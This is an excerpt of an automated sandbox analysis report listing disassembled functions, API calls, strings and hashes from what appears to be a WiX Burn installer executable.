Instruction ID: 3c594f8b74185efd35a94850988ec913e16819016a249e55e669aba30dbc29fc
Opcode Fuzzy Hash: 92b166c3b5f365fc2843a1063ba94fcf918336acd7de6d643fb675a2e4a4a83c
Instruction Fuzzy Hash: B841143A280211A7C7716A818C4BF6F6A54FB81B31F35856FF8025A2C2D76DC84282ED

Function 004C694B Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 133libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,ntdll,?), ref: 004C699B
GetLastError.KERNEL32 ref: 004C69A5
GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 004C69E8
GetLastError.KERNEL32 ref: 004C69F2
FreeLibrary.KERNEL32(00000000,00000000,?), ref: 004C6B03

Strings

Failed to locate RtlGetVersion., xrefs: 004C6A20
Failed to locate NTDLL., xrefs: 004C69D3
RtlGetVersion, xrefs: 004C69DD
variable.cpp, xrefs: 004C69C9, 004C6A16
Failed to set variant value., xrefs: 004C6AE7
ntdll, xrefs: 004C6995
Failed to get OS info., xrefs: 004C6A43

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$AddressFreeHandleLibraryModuleProc
String ID: Failed to get OS info.$Failed to locate NTDLL.$Failed to locate RtlGetVersion.$Failed to set variant value.$RtlGetVersion$ntdll$variable.cpp
API String ID: 3057421322-109962352
Opcode ID: a5b9ea6fd5ae37cb81c173d6bad0fb9e463f389ad754a2824b5d44f5fd240e25
Instruction ID: 1aa9976167d002b7080d5453d80d83318d028ae307e20ba530edf5483f212289
Opcode Fuzzy Hash: a5b9ea6fd5ae37cb81c173d6bad0fb9e463f389ad754a2824b5d44f5fd240e25
Instruction Fuzzy Hash: 6941D776D002399BDB719B558C49FEE7AB4FB09710F01819EED08B6280E7798E44CAD9

Function 004C48EF Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130memorysynchronizationCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00000001,00000001,00000000,00000000,?,?,?,004C5466,?,?,?,?), ref: 004C4920
GetLastError.KERNEL32(?,?,?,004C5466,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004C4931
ReleaseMutex.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004C4A6E
CloseHandle.KERNEL32(?,?,?,?,004C5466,?,?,?,?,?,?,?,?,?,?,?), ref: 004C4A77

Strings

engine.cpp, xrefs: 004C4955, 004C499E
Failed to allocate thread local storage for logging., xrefs: 004C495F
Failed to create the message window., xrefs: 004C49CC
Failed to connect to unelevated process., xrefs: 004C4916
comres.dll, xrefs: 004C49DD
Failed to set elevated pipe into thread local storage for logging., xrefs: 004C49A8
Failed to pump messages from parent process., xrefs: 004C4A42

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AllocCloseErrorHandleLastMutexRelease
String ID: Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create the message window.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$comres.dll$engine.cpp
API String ID: 687263955-1790235126
Opcode ID: afbe0b4c0120e560ece0627a477d5bfd999b2cc95ac7bbdabe080acb45dc3b84
Instruction ID: d9501ec32b96867caaa67ae591fe634cc8f755251668c799eaa841475d21740e
Opcode Fuzzy Hash: afbe0b4c0120e560ece0627a477d5bfd999b2cc95ac7bbdabe080acb45dc3b84
Instruction Fuzzy Hash: BB41D9B7940626BBD7519BA1CD99FEFBA6CBF44710F00021BFA14A6240DB35A91096E8

Function 004C7FA5 Relevance: 21.2, APIs: 2, Strings: 12, Instructions: 216COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,000000B9,00000002,?,00000000,00000000,00000000,00000000,00000001,00000000,00000002,000000B9), ref: 004C7FC2
LeaveCriticalSection.KERNEL32(?), ref: 004C81EA

Strings

Failed to write variable value as string., xrefs: 004C81AE
Failed to write variable value type., xrefs: 004C81CA
Unsupported variable type., xrefs: 004C81A7
Failed to get string., xrefs: 004C81B5
Failed to write variable name., xrefs: 004C81D1
Failed to get version., xrefs: 004C819B
Failed to get numeric., xrefs: 004C81BC
feclient.dll, xrefs: 004C809D, 004C80F3, 004C8134
Failed to write included flag., xrefs: 004C81D8
Failed to write variable value as number., xrefs: 004C8194
Failed to write literal flag., xrefs: 004C81C3
Failed to write variable count., xrefs: 004C7FDD

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get numeric.$Failed to get string.$Failed to get version.$Failed to write included flag.$Failed to write literal flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$feclient.dll
API String ID: 3168844106-2118673349
Opcode ID: 1ed2dae1f24ba03764532d82d2b83e24539ff99d90a581edc355005b21675249
Instruction ID: 653f806b926aff467e043d09352f0e56cd4909ff46e007672db34f1e2ddae075
Opcode Fuzzy Hash: 1ed2dae1f24ba03764532d82d2b83e24539ff99d90a581edc355005b21675249
Instruction Fuzzy Hash: AD71CF3680062AEFCB529EA5C844FAF7BA4BF04354F15412FF90067290DF38DD169BA9

Function 005002F8 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 123COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 0050033C
GetComputerNameW.KERNEL32(?,?), ref: 00500394

Strings

=== Logging started: %ls ===, xrefs: 005003BF
HdR, xrefs: 0050043D
ddR, xrefs: 0050044D
Executable: %ls v%d.%d.%d.%d, xrefs: 005003F0
8dR, xrefs: 0050030D
\dR, xrefs: 0050042D
@dR, xrefs: 00500445
--- logging level: %hs ---, xrefs: 00500454
TdR, xrefs: 00500435
Computer : %ls, xrefs: 00500402

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Name$ComputerFileModule
String ID: --- logging level: %hs ---$8dR$=== Logging started: %ls ===$@dR$Computer : %ls$Executable: %ls v%d.%d.%d.%d$HdR$TdR$\dR$ddR
API String ID: 2577110986-227893057
Opcode ID: 292c5e1ee08949d7b95851ed623de5b81a1d307c5804f149d45a210ed4404fc9
Instruction ID: c46c9140777dae9f74847188bb8891e6f42f339974fc5b9703f2892f492bc07e
Opcode Fuzzy Hash: 292c5e1ee08949d7b95851ed623de5b81a1d307c5804f149d45a210ed4404fc9
Instruction Fuzzy Hash: 684196B19001289BCF219F64DC85BEE7BBCFB55300F4451A6F609A31C2D670AE859FA9

Function 004D97B2 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 123fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,004DA843,00000000,00000000,00000000,?,00000000), ref: 004D97CD
GetLastError.KERNEL32(?,004DA843,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004D97DD

Part of subcall function 00504102: Sleep.KERNEL32(?,00000000,?,004D85EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,004C4DBC), ref: 00504119

CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 004D98E9

Strings

%ls payload from working path '%ls' to path '%ls', xrefs: 004D9894
Failed to move %ls to %ls, xrefs: 004D98C1
Failed to open payload in working path: %ls, xrefs: 004D980C
Failed to verify payload hash: %ls, xrefs: 004D9875
Failed to copy %ls to %ls, xrefs: 004D98D7
Failed to verify payload signature: %ls, xrefs: 004D9838
Moving, xrefs: 004D987F
cache.cpp, xrefs: 004D9801
Copying, xrefs: 004D9888, 004D9893

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLastSleep
String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$cache.cpp
API String ID: 1275171361-1604654059
Opcode ID: 6592ec59812fac9754a79d1e3150b26867241b0a4099a03fbd49853a24a85076
Instruction ID: 1c829e5b035b6c03e7e7e0bbcabcc53c756820e3344a689ced2a6d0eb741b829
Opcode Fuzzy Hash: 6592ec59812fac9754a79d1e3150b26867241b0a4099a03fbd49853a24a85076
Instruction Fuzzy Hash: BA31EB72A502357BEA313A558C6AF6F2E6CEF46F50F010117FD14FB381D2659D00A6E5

Function 004C65C0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 118COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000), ref: 004C65FC

Part of subcall function 00500ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,004C5EB2,00000000), ref: 00500AE0
Part of subcall function 00500ACC: GetProcAddress.KERNEL32(00000000), ref: 00500AE7
Part of subcall function 00500ACC: GetLastError.KERNEL32(?,?,?,004C5EB2,00000000), ref: 00500AFE

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004C6628
GetLastError.KERNEL32 ref: 004C6636
GetSystemWow64DirectoryW.KERNEL32(?,00000104,00000000), ref: 004C666E
GetLastError.KERNEL32 ref: 004C6678
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004C66BB
GetLastError.KERNEL32 ref: 004C66C5

Strings

Failed to backslash terminate system folder., xrefs: 004C6708
variable.cpp, xrefs: 004C665A, 004C669C
Failed to get 64-bit system folder., xrefs: 004C6664
Failed to get 32-bit system folder., xrefs: 004C66A6
Failed to set system folder variant value., xrefs: 004C6724

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$DirectorySystem$AddressCurrentHandleModuleProcProcessWow64
String ID: Failed to backslash terminate system folder.$Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$variable.cpp
API String ID: 325818893-1590374846
Opcode ID: d54b577bc72e0fd0a8de548c7b403fd45af2b3d6d9423a6c95bb3995ea290b47
Instruction ID: 3138ffa3c8e56db5200a5184612a99e86ff05671330bab47c3951e6fc5904187
Opcode Fuzzy Hash: d54b577bc72e0fd0a8de548c7b403fd45af2b3d6d9423a6c95bb3995ea290b47
Instruction Fuzzy Hash: 6031077AE4123567DB209BA18C4DF9F7B68AF10750F02856EBD04B7280D77CDD448AE9

Function 004D3F9B Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 220sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004D3AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,004D3FB5,feclient.dll,?,00000000,?,?,?,004C4B12), ref: 004D3B42

Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,004C4B12,?,?,0050B488,?,00000001,00000000,00000000), ref: 004D404C

Strings

Failed to copy full log path to prefix., xrefs: 004D41AF
Failed to open log: %ls, xrefs: 004D40C8
Failed to copy log path to prefix., xrefs: 004D416E
Failed to get non-session specific TEMP folder., xrefs: 004D40F6
Failed to copy log extension to extension., xrefs: 004D4191
log, xrefs: 004D3FF3
Setup, xrefs: 004D3FF9
msasn1.dll, xrefs: 004D4162, 004D41A3
crypt32.dll, xrefs: 004D3FF2, 004D4057, 004D405F, 004D40C6, 004D4100, 004D4141, 004D4160, 004D419E, 004D41C8
feclient.dll, xrefs: 004D3FAF, 004D405C
Failed to get current directory., xrefs: 004D402E
clbcatq.dll, xrefs: 004D4185

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseSleep
String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
API String ID: 2834455192-2673269691
Opcode ID: f70562bbc9aea0caabb1af67a877b78dd9458a2b3c0c29268b81ca3d17a30a30
Instruction ID: 63c1863e2aabb5e2a497c48c417c27cd7d2913108340a83a5aeacd6b6a9c0aa0
Opcode Fuzzy Hash: f70562bbc9aea0caabb1af67a877b78dd9458a2b3c0c29268b81ca3d17a30a30
Instruction Fuzzy Hash: DB61B671A00216ABDF229F64CC6AB7B7BA8EF50350F04415BF901DB390E779ED908799

Function 004C6DB9 Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 166COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000001,?,00000000,004C5445,00000006,?,004C82B9,?,?,?,00000000,00000000,00000001), ref: 004C6DC8

Part of subcall function 004C56A9: CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,004C6595,004C6595,?,004C563D,?,?,00000000), ref: 004C56E5
Part of subcall function 004C56A9: GetLastError.KERNEL32(?,004C563D,?,?,00000000,?,?,004C6595,?,004C7F02,?,?,?,?,?), ref: 004C5714

LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,004C82B9), ref: 004C6F59

Strings

variable.cpp, xrefs: 004C6E4B
Failed to set value of variable: %ls, xrefs: 004C6F41
Failed to find variable value '%ls'., xrefs: 004C6DE3
Setting numeric variable '%ls' to value %lld, xrefs: 004C6EFA
Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 004C6F6B
Setting string variable '%ls' to value '%ls', xrefs: 004C6EED
Unsetting variable '%ls', xrefs: 004C6F15
Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 004C6ED0
Failed to insert variable '%ls'., xrefs: 004C6E0D
Attempt to set built-in variable value: %ls, xrefs: 004C6E56
Setting hidden variable '%ls', xrefs: 004C6E86

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalSection$CompareEnterErrorLastLeaveString
String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
API String ID: 2716280545-445000439
Opcode ID: 6e8508eae6104fb0371ffbcfa3282cdca5c6e2824625c9912f9f780ac5a61e79
Instruction ID: 9193158d223631c2d0ce634167ddfd1e345adf32d5ccf18ca97b9eaf33036d50
Opcode Fuzzy Hash: 6e8508eae6104fb0371ffbcfa3282cdca5c6e2824625c9912f9f780ac5a61e79
Instruction Fuzzy Hash: C551D279A00225A7DB709E15CC4AF7B3FA8FB55704F12811FF845562C2C279D841CAA9

Function 004D2C1C Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 299COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000001,006C0064,000000FF,002C002B,000000FF,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 004D2C8A

Strings

Failed to add self-dependent to ignore dependents., xrefs: 004D2D0E
Failed to add dependents ignored from command-line., xrefs: 004D2D3F
Failed to allocate registration action., xrefs: 004D2CF3
Failed to add dependent bundle provider key to ignore dependents., xrefs: 004D2DF4
wininet.dll, xrefs: 004D2ED7
Failed to add registration action for dependent related bundle., xrefs: 004D2F8E
crypt32.dll, xrefs: 004D2CD5, 004D2DCF, 004D2EC4, 004D2F39
Failed to create the string dictionary., xrefs: 004D2CC3
Failed to add registration action for self dependent., xrefs: 004D2F57
Failed to check for remaining dependents during planning., xrefs: 004D2E30

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CompareString
String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.$crypt32.dll$wininet.dll
API String ID: 1825529933-1705955799
Opcode ID: 92f1c7fd5e65928c32c234abf2cadec19426c6e818810fbf1c4585ce4b2cdc02
Instruction ID: 4c1ff0783716c62f0b6ce9fcb72cd78a28cc3baf71005af8d1a4f2ec182e827e
Opcode Fuzzy Hash: 92f1c7fd5e65928c32c234abf2cadec19426c6e818810fbf1c4585ce4b2cdc02
Instruction Fuzzy Hash: 26B1BE70A00216EBDF299F24CA51BAE7BB5FF24711F00812BF804AB351C7B8D951DB99

Function 004DF90B Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 187COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 004DF947
UuidCreate.RPCRT4(?), ref: 004DFA2A
StringFromGUID2.OLE32(?,?,00000027), ref: 004DFA4B
LeaveCriticalSection.KERNEL32(?,?), ref: 004DFAF4

Strings

update\%ls, xrefs: 004DF9A3
Failed to default local update source, xrefs: 004DF9B7
Failed to set update bundle., xrefs: 004DFACE
Failed to recreate command-line for update bundle., xrefs: 004DFA12
EngineForApplication.cpp, xrefs: 004DFA60
Failed to convert bundle update guid into string., xrefs: 004DFA6A
Failed to create bundle update guid., xrefs: 004DFA37

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalSection$CreateEnterFromLeaveStringUuid
String ID: EngineForApplication.cpp$Failed to convert bundle update guid into string.$Failed to create bundle update guid.$Failed to default local update source$Failed to recreate command-line for update bundle.$Failed to set update bundle.$update\%ls
API String ID: 171215650-2594647487
Opcode ID: 53040f8be9d5607d175c8ab396d48eda9f77c367803c241f68df60079efd3d2a
Instruction ID: cd2b5a04b59f62fc12f3c73be37b847a4b97f983124be6698cd48ea0a01cf2b3
Opcode Fuzzy Hash: 53040f8be9d5607d175c8ab396d48eda9f77c367803c241f68df60079efd3d2a
Instruction Fuzzy Hash: DA61BB71940215ABDF328FA4C865FAEBBB4EF08710F10417BF80AAB351D7799845CB95

Function 004C4AE5 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 144windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 004C4C64
PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004C4C75

Strings

Failed to set registration variables., xrefs: 004C4BDE
Failed to create the message window., xrefs: 004C4B98
Failed to check global conditions, xrefs: 004C4B49
Failed to set action variables., xrefs: 004C4BC4
Failed while running , xrefs: 004C4C2A
Failed to open log., xrefs: 004C4B18
Failed to set layout directory variable to value provided from command-line., xrefs: 004C4C06
Failed to query registration., xrefs: 004C4BAE
WixBundleLayoutDirectory, xrefs: 004C4BF5

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: MessagePostWindow
String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
API String ID: 3618638489-3051724725
Opcode ID: af5500c898916fa949f265a41e67f4d64ace05c6bc4e833a8c90f4c985e5734d
Instruction ID: 8a087f2e440b0f8884989efd550b6a639f1247fefa014b9a9f26327b276909f4
Opcode Fuzzy Hash: af5500c898916fa949f265a41e67f4d64ace05c6bc4e833a8c90f4c985e5734d
Instruction Fuzzy Hash: CD413B35601A1BBBDB665A20CEA5FBBBA5CFF40754F01021FF80096260E778EC1097D9

Function 004DF051 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 125COMMON

Download Yara Rule

APIs

Part of subcall function 004C394F: GetProcessHeap.KERNEL32(?,000001C7,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3960
Part of subcall function 004C394F: RtlAllocateHeap.NTDLL(00000000,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3967

EnterCriticalSection.KERNEL32(?,00000014,00000001), ref: 004DF06E
LeaveCriticalSection.KERNEL32(?), ref: 004DF19B

Strings

Failed to post launch approved exe message., xrefs: 004DF186
Engine is active, cannot change engine state., xrefs: 004DF089
Failed to copy the id., xrefs: 004DF100
UX requested unknown approved exe with id: %ls, xrefs: 004DF0CE
Failed to copy the arguments., xrefs: 004DF12D
EngineForApplication.cpp, xrefs: 004DF17C

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalHeapSection$AllocateEnterLeaveProcess
String ID: Engine is active, cannot change engine state.$EngineForApplication.cpp$Failed to copy the arguments.$Failed to copy the id.$Failed to post launch approved exe message.$UX requested unknown approved exe with id: %ls
API String ID: 1367039788-528931743
Opcode ID: 8d30faddf8af5f8647e7410b6c3f0c63a74b6188da415e8f271a164c779447df
Instruction ID: f3f207c1e43c5f626a1d7aa3518ba941afce254b37a1faab837b9254f52b963e
Opcode Fuzzy Hash: 8d30faddf8af5f8647e7410b6c3f0c63a74b6188da415e8f271a164c779447df
Instruction Fuzzy Hash: 1631F236A01222EBDB329F64CC55E9F3BA8AF00720B01852BFC05EB341EB38DD048694

Function 004D969D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,004DA7D4,00000000,00000000,00000000,?,00000000), ref: 004D96B8
GetLastError.KERNEL32(?,004DA7D4,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004D96C6

Part of subcall function 00504102: Sleep.KERNEL32(?,00000000,?,004D85EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,004C4DBC), ref: 00504119

CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 004D97A4

Strings

Failed to open container in working path: %ls, xrefs: 004D96F5
%ls container from working path '%ls' to path '%ls', xrefs: 004D974F
Failed to verify container hash: %ls, xrefs: 004D9727
Failed to move %ls to %ls, xrefs: 004D977C
Failed to copy %ls to %ls, xrefs: 004D9792
Moving, xrefs: 004D973A
cache.cpp, xrefs: 004D96EA
Copying, xrefs: 004D9743, 004D974E

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

